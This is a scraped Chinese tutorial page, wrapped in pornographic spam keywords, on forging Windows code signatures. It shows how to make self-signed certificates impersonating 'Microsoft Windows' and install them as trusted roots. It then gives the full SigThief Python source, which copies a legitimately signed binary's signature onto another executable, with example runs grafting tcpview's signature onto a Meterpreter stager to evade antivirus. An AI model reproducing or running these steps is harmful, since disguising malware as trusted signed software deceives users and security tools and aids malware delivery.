成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁(yè) > 知識(shí)庫(kù) > Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟

Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟

熱門(mén)標(biāo)簽:百度地圖標(biāo)注位置怎么修改 洪澤縣地圖標(biāo)注 高德地圖標(biāo)注是免費(fèi)的嗎 無(wú)錫客服外呼系統(tǒng)一般多少錢(qián) 老人電話(huà)機(jī)器人 北京電信外呼系統(tǒng)靠譜嗎 大連crm外呼系統(tǒng) 梅州外呼業(yè)務(wù)系統(tǒng) 地圖標(biāo)注視頻廣告

證書(shū)制作工具下載: https://github.com/3gstudent/signtools

制作并簽發(fā)證書(shū):

正常情況下,針對(duì)exe簽發(fā)證書(shū)有如下幾個(gè)步驟.

1.查詢(xún)一個(gè)程序中存在的證書(shū),可以使用下面三個(gè)命令。

c:\&; signtools Get-AuthenticodeSignature C:\Windows\System32\ConsentUX.dll
c:\&; signtools signtool.exe verify /v C:\Windows\System32\ConsentUX.dll
c:\&; signtools sigcheck.exe -q C:\Windows\System32\ConsentUX.dll

2.使用makecert命令制作證書(shū),sv-私鑰文件名,ss-主題的證書(shū)存儲(chǔ)名稱(chēng),n-證書(shū)頒發(fā)對(duì)象,r-證書(shū)存儲(chǔ)位置。

c:\&; signtools makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
c:\&; signtools cert2spc Root.cer Root.spc
c:\&; signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f

3.注冊(cè)證書(shū)與簽發(fā)證書(shū)。

c:\&; signtools certmgr.exe -add -c Root.cer -s -r localmachine root
c:\&; signtools signtool sign /f Root.pfx /p 1233 lyshark.exe

而如果要給PowerShell腳本添加證書(shū),則執(zhí)行如下命令即可.

1.生成證書(shū)文件

c:\&; makecert -n "CN=Microsoft Windows" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cer
c:\&; cert2spc certtest.cer certtest.spc
c:\&; pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f

2.給powershell腳本簽名

c:\&; powershell
c:\&; $cert = Get-PfxCertificate certtest.pfx
c:\&; Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert

偽造PE文件證書(shū):

有些反病毒軟件供應(yīng)商優(yōu)先考慮某些證書(shū)頒發(fā)機(jī)構(gòu)而不檢查簽名是否真正有效,并且有一些只是檢查以查看certTable是否填充了某些值。這個(gè)工具讓你快速將從已簽名的PE文件中刪除簽名并將其附加到另一個(gè)文件,修復(fù)證書(shū)表以對(duì)文件進(jìn)行簽名。

開(kāi)源工具SigThief可用于偽造證書(shū),將下方代碼保存為sigthief.py即可:

import sys
import struct
import shutil
import io
from optparse import OptionParser

def gather_file_info_win(binary):
        """
        Borrowed from BDF...
        I could just skip to certLOC... *shrug*
        """
        flItms = {}
        binary = open(binary, 'rb')
        binary.seek(int('3C', 16))
        flItms['buffer'] = 0
        flItms['JMPtoCodeAddress'] = 0
        flItms['dis_frm_pehdrs_sectble'] = 248
        flItms['pe_header_location'] = struct.unpack('i', binary.read(4))[0]
        # Start of COFF
        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
        binary.seek(flItms['COFF_Start'])
        flItms['MachineType'] = struct.unpack('H', binary.read(2))[0]
        binary.seek(flItms['COFF_Start'] + 2, 0)
        flItms['NumberOfSections'] = struct.unpack('H', binary.read(2))[0]
        flItms['TimeDateStamp'] = struct.unpack('I', binary.read(4))[0]
        binary.seek(flItms['COFF_Start'] + 16, 0)
        flItms['SizeOfOptionalHeader'] = struct.unpack('H', binary.read(2))[0]
        flItms['Characteristics'] = struct.unpack('H', binary.read(2))[0]
        #End of COFF
        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20

        #if flItms['SizeOfOptionalHeader']:
            #Begin Standard Fields section of Optional Header
        binary.seek(flItms['OptionalHeader_start'])
        flItms['Magic'] = struct.unpack('H', binary.read(2))[0]
        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
        flItms['SizeOfCode'] = struct.unpack("I", binary.read(4))[0]
        flItms['SizeOfInitializedData'] = struct.unpack("I", binary.read(4))[0]
        flItms['SizeOfUninitializedData'] = struct.unpack("I",
                                                               binary.read(4))[0]
        flItms['AddressOfEntryPoint'] = struct.unpack('I', binary.read(4))[0]
        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
        flItms['BaseOfCode'] = struct.unpack('I', binary.read(4))[0]
        if flItms['Magic'] != 0x20B:
            flItms['BaseOfData'] = struct.unpack('I', binary.read(4))[0]
        # End Standard Fields section of Optional Header
        # Begin Windows-Specific Fields of Optional Header
        if flItms['Magic'] == 0x20B:
            flItms['ImageBase'] = struct.unpack('Q', binary.read(8))[0]
        else:
            flItms['ImageBase'] = struct.unpack('I', binary.read(4))[0]
        flItms['SectionAlignment'] = struct.unpack('I', binary.read(4))[0]
        flItms['FileAlignment'] = struct.unpack('I', binary.read(4))[0]
        flItms['MajorOperatingSystemVersion'] = struct.unpack('H',
                                                                   binary.read(2))[0]
        flItms['MinorOperatingSystemVersion'] = struct.unpack('H',
                                                                   binary.read(2))[0]
        flItms['MajorImageVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MinorImageVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MajorSubsystemVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['MinorSubsystemVersion'] = struct.unpack('H', binary.read(2))[0]
        flItms['Win32VersionValue'] = struct.unpack('I', binary.read(4))[0]
        flItms['SizeOfImageLoc'] = binary.tell()
        flItms['SizeOfImage'] = struct.unpack('I', binary.read(4))[0]
        flItms['SizeOfHeaders'] = struct.unpack('I', binary.read(4))[0]
        flItms['CheckSum'] = struct.unpack('I', binary.read(4))[0]
        flItms['Subsystem'] = struct.unpack('H', binary.read(2))[0]
        flItms['DllCharacteristics'] = struct.unpack('H', binary.read(2))[0]
        if flItms['Magic'] == 0x20B:
            flItms['SizeOfStackReserve'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfStackCommit'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfHeapReserve'] = struct.unpack('Q', binary.read(8))[0]
            flItms['SizeOfHeapCommit'] = struct.unpack('Q', binary.read(8))[0]

        else:
            flItms['SizeOfStackReserve'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfStackCommit'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfHeapReserve'] = struct.unpack('I', binary.read(4))[0]
            flItms['SizeOfHeapCommit'] = struct.unpack('I', binary.read(4))[0]
        flItms['LoaderFlags'] = struct.unpack('I', binary.read(4))[0]  # zero
        flItms['NumberofRvaAndSizes'] = struct.unpack('I', binary.read(4))[0]
        # End Windows-Specific Fields of Optional Header
        # Begin Data Directories of Optional Header
        flItms['ExportTableRVA'] = struct.unpack('I', binary.read(4))[0]
        flItms['ExportTableSize'] = struct.unpack('I', binary.read(4))[0]
        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
        #ImportTable SIZE|LOC
        flItms['ImportTableRVA'] = struct.unpack('I', binary.read(4))[0]
        flItms['ImportTableSize'] = struct.unpack('I', binary.read(4))[0]
        flItms['ResourceTable'] = struct.unpack('Q', binary.read(8))[0]
        flItms['ExceptionTable'] = struct.unpack('Q', binary.read(8))[0]
        flItms['CertTableLOC'] = binary.tell()
        flItms['CertLOC'] = struct.unpack("I", binary.read(4))[0]
        flItms['CertSize'] = struct.unpack("I", binary.read(4))[0]
        binary.close()
        return flItms


def copyCert(exe):
    flItms = gather_file_info_win(exe)

    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Input file Not signed!")
        sys.exit(-1)

    with open(exe, 'rb') as f:
        f.seek(flItms['CertLOC'], 0)
        cert = f.read(flItms['CertSize'])
    return cert


def writeCert(cert, exe, output):
    flItms = gather_file_info_win(exe)
    
    if not output: 
        output = output = str(exe) + "_signed"

    shutil.copy2(exe, output)
    
    print("Output file: {0}".format(output))

    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("I", len(open(exe, 'rb').read())))
            f.write(struct.pack("I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)

    print("Signature appended. \nFIN.")

def outputCert(exe, output):
    cert = copyCert(exe)
    if not output:
        output = str(exe) + "_sig"

    print("Output file: {0}".format(output))

    open(output, 'wb').write(cert)

    print("Signature ripped. \nFIN.")


def check_sig(exe):
    flItms = gather_file_info_win(exe)
 
    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
    else:
        print("Inputfile is signed!")


def truncate(exe, output):
    flItms = gather_file_info_win(exe)
 
    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
        sys.exit(-1)
    else:
        print( "Inputfile is signed!")

    if not output:
        output = str(exe) + "_nosig"

    print("Output file: {0}".format(output))

    shutil.copy2(exe, output)

    with open(output, "r+b") as binary:
        print('Overwriting certificate table pointer and truncating binary')
        binary.seek(-flItms['CertSize'], io.SEEK_END)
        binary.truncate()
        binary.seek(flItms['CertTableLOC'], 0)
        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")

    print("Signature removed. \nFIN.")


def signfile(exe, sigfile, output):
    flItms = gather_file_info_win(exe)
    
    cert = open(sigfile, 'rb').read()

    if not output: 
        output = output = str(exe) + "_signed"

    shutil.copy2(exe, output)
    
    print("Output file: {0}".format(output))
    
    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("I", len(open(exe, 'rb').read())))
            f.write(struct.pack("I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)
    print("Signature appended. \nFIN.")


if __name__ == "__main__":
    usage = 'usage: %prog [options]'
    parser = OptionParser()
    parser.add_option("-i", "--file", dest="inputfile", 
                  help="input file", metavar="FILE")
    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
                  help='rip signature off inputfile')
    parser.add_option('-a', '--add', dest='addsig', action='store_true',
                  help='add signautre to targetfile')
    parser.add_option('-o', '--output', dest='outputfile',
                  help='output file')
    parser.add_option('-s', '--sig', dest='sigfile',
                  help='binary signature from disk')
    parser.add_option('-t', '--target', dest='targetfile',
                  help='file to append signature to')
    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
                  help='file to check if signed; does not verify signature')
    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
                  help='truncate signature (i.e. remove sig)')
    (options, args) = parser.parse_args()
    
    # rip signature
    # inputfile and rip to outputfile
    if options.inputfile and options.ripsig:
        print("Ripping signature to file!")
        outputCert(options.inputfile, options.outputfile)
        sys.exit()    

    # copy from one to another
    # inputfile and rip to targetfile to outputfile    
    if options.inputfile and options.targetfile:
        cert = copyCert(options.inputfile)
        writeCert(cert, options.targetfile, options.outputfile)
        sys.exit()

    # check signature
    # inputfile 
    if options.inputfile and options.checksig:
        check_sig(options.inputfile) 
        sys.exit()

    # add sig to target file
    if options.targetfile and options.sigfile:
        signfile(options.targetfile, options.sigfile, options.outputfile)
        sys.exit()
        
    # truncate
    if options.inputfile and options.truncate:
        truncate(options.inputfile, options.outputfile)
        sys.exit()

    parser.print_help()
    parser.error("You must do something!")

我們需要找一個(gè)帶有證書(shū)的文件,然后通過(guò)使用sigthief.py完成證書(shū)的克隆。此處就拿系統(tǒng)中的ConsentUX.dll演示。

c:\&; python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exe
Output file: check.exe
Signature appended.
FIN.

也可以從二進(jìn)制文件中獲取簽名并將其添加到另一個(gè)二進(jìn)制文件中

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
Output file: /tmp/msftesting_tcpview.exe
Signature appended. 
FIN.

將簽名保存到磁盤(pán)以供以后使用,提供了一個(gè)轉(zhuǎn)存功能。

$ ./sigthief.py -i tcpview.exe -r                                                        
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped. 
FIN.
```BASH
使用翻錄簽名
```BASH
$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
Output file: x86_meterpreter_stager.exe_signed
Signature appended. 
FIN.
```BASH
截?cái)啵▌h除)簽名 這實(shí)際上有非常有趣的結(jié)果,可以幫助您找到重視代碼功能簽名的AV)
```BASH
$ ./sigthief.py -i tcpview.exe -T    
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed. 
FIN.

文章出處:https://www.cnblogs.com/lyshark

以上就是Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟的詳細(xì)內(nèi)容,更多關(guān)于Python使用sigthief簽發(fā)證書(shū)的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

您可能感興趣的文章:
  • 基于python檢查SSL證書(shū)到期情況代碼實(shí)例
  • Python SSL證書(shū)驗(yàn)證問(wèn)題解決方案
  • python requests證書(shū)問(wèn)題解決
  • python有證書(shū)的加密解密實(shí)現(xiàn)方法
  • python實(shí)現(xiàn)無(wú)證書(shū)加密解密實(shí)例

標(biāo)簽:岳陽(yáng) 怒江 長(zhǎng)春 清遠(yuǎn) 吉林 安慶 洛陽(yáng) 泉州

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟》,本文關(guān)鍵詞  Python,使用,sigthief,簽發(fā),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    日日鲁鲁鲁夜夜爽爽狠狠视频97| 丁香花高清电影在线观看完整版| 久久躁日日躁aaaaxxxx| 国产第一页第二页| 亚洲精品黄网在线观看| 99香蕉久久| 亚洲成人99| 成人高清在线视频| 欧美熟妇乱码在线一区| 男人舔女人下部高潮全视频| 99久久婷婷国产综合精品青牛牛| 99热在线这里只有精品| 欧美videosex性极品hd| 日韩精品一区二区亚洲av| 国产又粗又猛又黄又爽无遮挡| 宅男深夜视频| 男生裸体视频网站| 国产suv一区二区三区| 亚洲综合激情在线| 日本一区二区免费在线观看视频| 99精品免费观看| 久久国产免费视频| 特黄三级视频| 中文幕一区二区三区久久蜜桃| 美女精品一区二区| 亚洲天堂一区| 强伦女教师2:伦理在线观看| 亚洲男女自偷自拍| 最新国产热播激情视频| 男人天堂v视频| 欧美国产成人在线| 人猿泰山h版在线观看| 精品欧美不卡一区二区在线观看| 天堂资源av| 欧美一区二区三区视频在线| 久久精品三级| 免费成人在线观看av| 国产视频青青| 精品999视频| 欧美精品一区二区三区蜜桃| 欧美爱爱视频| 国产精品久久久久秋霞鲁丝| 91麻豆免费看| 蜜桃久久av一区| 久久亚洲春色中文字幕久久久| 亚洲成人一区二区| 精品午夜一区二区| 欧美精品一区二区三区在线| 人成在线免费网站| 久久蜜臀精品av| 久久影院100000精品| 狠狠干夜夜爽| 91精品国产综合久久香蕉| 亚洲国产欧美一区二区三区不卡| 91久久精品国产91性色69| 亚洲人成网7777777国产| 伊人色在线视频| 亚洲欧美综合区自拍另类| 久久久久久av无码免费看大片| 综合成人在线| 噜噜噜躁狠狠躁狠狠精品视频| 日本精品一区二区| 日韩精品伦理第一区| 亚洲人成77777男人| 欧美网站在线| 亚洲精品一区二区三区在线| 97偷自拍亚洲综合二区| 亚洲av成人精品一区二区三区在线播放| 性欧美一区二区三区| 国产寡妇亲子伦一区二区三区四区| 色999日韩国产欧美一区二区| 色老头一区二区三区在线观看| 亚洲视频999| www.激情小说.com| 99热这里只有精品8| 在线国产一区二区| 美国黄色a级片| 欧美日韩视频免费在线观看| 超碰在线播放91| 7m第一福利500精品视频| 69视频在线观看免费| 婷婷成人基地| 一本加勒比hezyo黑人| 视频在线日韩| 国产美女自拍视频| 麻豆成人入口| 久久午夜精品视频| 男人用嘴添女人下身免费视频| 日韩精品1区2区| 免费a级毛片在线播放| 国产日本在线播放| 亚洲欧洲精品一区二区三区| 色欲一区二区三区精品a片| 丰满少妇在线观看| 国产精品主播| 先锋影音在线资源站91| 亚洲精品国产suv一区| 国产精品一区二区免费不卡| 亚洲国产视频在线| 91精品国产综合久久久蜜臀九色| 国产成人av无码精品| 麻豆传媒一区二区| 一级成人免费视频| 国产高清自拍99| 欧美 日韩 国产精品| 国产精品观看| 偷窥韩漫第三季| 一区二区免费在线观看视频| 日韩欧美视频免费在线观看| 色综合91久久精品中文字幕| 国产小视频免费观看| 日本国产在线| 操人视频在线观看欧美| 亚洲天堂成人在线视频| 美女在线视频一区二区| 亚洲av成人无码久久精品| 极品美妇后花庭翘臀娇吟小说| 亚洲av无码不卡| 欧美超碰在线| 欧美日韩在线资源| 欧美成人性生活| 麻豆入口视频在线观看| 天堂在线观看一卡二卡三卡四卡| 久无码久无码av无码| 狠狠色丁香久久婷婷综合_中| 日韩欧美中文字幕一区二区三区| wwwwww国产| av电影天堂一区二区在线观看| 你懂的在线视频观看| 欧美色一级片| 国产91精品久久久久久| 国产在线一级片| 久久精品一级片| 日韩av在线网站| 小早川怜子影音先锋在线观看| 97视频网站入口| 国内外激情在线| 麻豆精品免费视频| 岛国中文字幕在线| 国产精品欧美三级在线观看| 久久精品国产亚洲一区二区| 亚洲天堂精品在线| 女人天堂av手机在线| 中文.日本.精品| 一区二区三区视频在线观看视频| 日韩黄色大片| 国产成人午夜片在线观看高清观看| 亚洲最快最全在线视频| 97在线免费视频观看| 亚洲黄色尤物视频| 亚洲三级电影在线观看| 欧美成人精品| 国产成人久久精品| 精品一区av| 亚洲国产精品久久网午夜小说| 久久久久久天堂| 亚洲不卡在线播放| 成人av在线资源网站| 精品人伦一区二区三区蜜桃网站| 中文字幕第24页| 啊v视频在线一区二区三区| 欧美午夜一区二区三区| 免费精品99久久国产综合精品应用| 一二三四视频社区在线| a在线视频播放观看免费观看| 丝袜制服一区二区三区| 性欧美精品一区二区三区在线播放| 亚洲免费网站在线观看| 亚洲欧美国产高清va在线播| 少妇高潮久久77777| 久久青草免费| 一级香蕉视频在线观看| 人体精品一二三区| 国产熟女高潮视频| 亚洲综合在线网站| 精品国产免费人成电影在线观看四季| 国产精品国产成人国产三级| 国产电影精品久久禁18| 欧美一级片免费在线观看| 成人免费看片网站| 一区二区成人在线观看| 中文字幕一区二区三区四区在线视频| 特一级黄色录像| 欧美高清视频免费观看| 毛片毛片女人毛片毛片| 成人免费视频视频在| 欧美激情一区二区三区不卡| 国产精品狼人色视频一区| 成人蜜臀av电影| 91精品国自产| 99在线视频免费| | www.999av| 在线免费av资源| 狠狠躁18三区二区一区| 国产免费无遮挡| 欧美久久综合| 亚洲一区二区三区色| 精品久久久久久久一区二区蜜臀| 日本亚洲欧洲色α| 中文在线а天堂av| 国产在线观看h| 91香蕉视频在线下载| 性色一区二区| 欧洲伦理片一区 二区 三区| 午夜精品久久久久久久久久久| 尤物在线免费视频| 久久久久久久久伊人| 亚洲丝袜精品丝袜在线| 成人免费91在线看| 成熟妇人a片免费看网站| 天美传媒免费在线观看| 亚洲天堂av一区二区三区| 色噜噜狠狠成人网p站| 97人人爽人人喊人人模波多| 无码人妻h动漫| 99久久精品国产一区色| 久久精品欧美一区二区三区麻豆| 91精品综合久久久久久久久久久| 国产精品jvid在线观看| 国产美女精品人人做人人爽| 国产毛片av在线| 黄色大片在线| 亚洲精品写真福利| 亚洲中字在线| 夜夜躁很很躁日日躁麻豆| 久久先锋影音av鲁色资源| 一区视频在线播放| 亚洲第一搞黄网站| 软萌小仙自慰喷白浆| 国产精品一区三区在线观看| 99re这里只有精品首页| 六月丁香激情综合| freexxxx性特大另类| 久久国产热视频| 国产欧美一区二区三区在线看蜜臀| 国产成人天天5g影院在线观看| 农村少妇一区二区三区四区五区| 奇米影视第四狠狠777| 最近中文字幕大全中文字幕免费| 91蜜桃视频在线观看| 这里只有精品免费视频| 亚洲 国产 日韩 欧美| 国产精品久久久久毛片软件| www.视频一区| 日韩电影二区| 特黄一区二区三区| 神马久久久久久久久久| 交videos老少配com| 亚洲911精品成人18网站| 国产一区激情在线| 日韩欧美中文视频| 久久国产精品视频在线观看| 91超碰这里只有精品国产| 国产欧美在线观看免费| 国产精品亚洲一区二区三区在线| 91麻豆精品秘密入口| 国产剧情一区二区| 国产三区在线播放| 天堂一区二区在线免费观看| 欧美色黄视频| 欧美性大战久久久久久久蜜臀| 亚洲国产成人精品女人久久久| 国产亚洲欧美在线视频| 在线免费观看日本欧美| 天天做天天爱天天综合网2021| 欧美日韩一本到| 明星裸体视频一区二区| 一本久久a久久免费精品不卡| 粉嫩aⅴ一区二区三区四区| 爱啪导航一精品导航站| 制服丝袜一区二区三区| 久久夜色精品国产欧美乱极品| 蜜桃av在线播放| 亚洲精品乱码久久久久久蜜桃图片| 特级做a爱片免费69| 亚洲精品久久久久久一区二区| 国产一区免费看| 久久久久久国产精品mv| 在线观看国产麻豆| 杨钰莹一级淫片aaaaaa播放| 国产精品不卡一区二区三区在线观看| 欧美视频第三页| 亚洲片国产一区一级在线观看| 国产成人精品久久二区二区91| 色哦色哦哦色天天综合| 禁果av一区二区三区| 亚洲图片在线综合| 4p变态网欧美系列| 一级在线观看| а√天堂资源国产精品| 狠狠爱综合网| 欧美色999| 国产农村妇女精品一二区| 污污影院在线观看| 精品亚洲aⅴ无码一区二区三区| 在线不卡中文字幕播放| 蜜桃av噜噜一区| 嫩草懂你的影院| 91九色porny在线| 亚洲人成电影网站色| 91视频免费看| 国产精品资源在线看| 亚洲人精品午夜| 成人午夜免费视频| 成人午夜sm精品久久久久久久| 国产成人综合自拍| 中文在线日韩| 午夜老司机精品| 影音先锋中文字幕一区| 午夜激情影院在线观看| 国产麻豆永久视频| 国产亚洲欧美一区二区三区| 91成人入口| 午夜dv内射一区二区| 欧美午夜不卡视频| 国产在线超碰| 人妻与黑人一区二区三区| 国产精品字幕| 日韩一二三区| 亚洲午夜久久| 欧美影院一区二区| 国产人妖ts一区二区| 亚洲每日在线| 国产露脸国语对白在线| 欧美人与牲动交xxxx| 亚洲一区二区av在线| 色佬视频在线观看|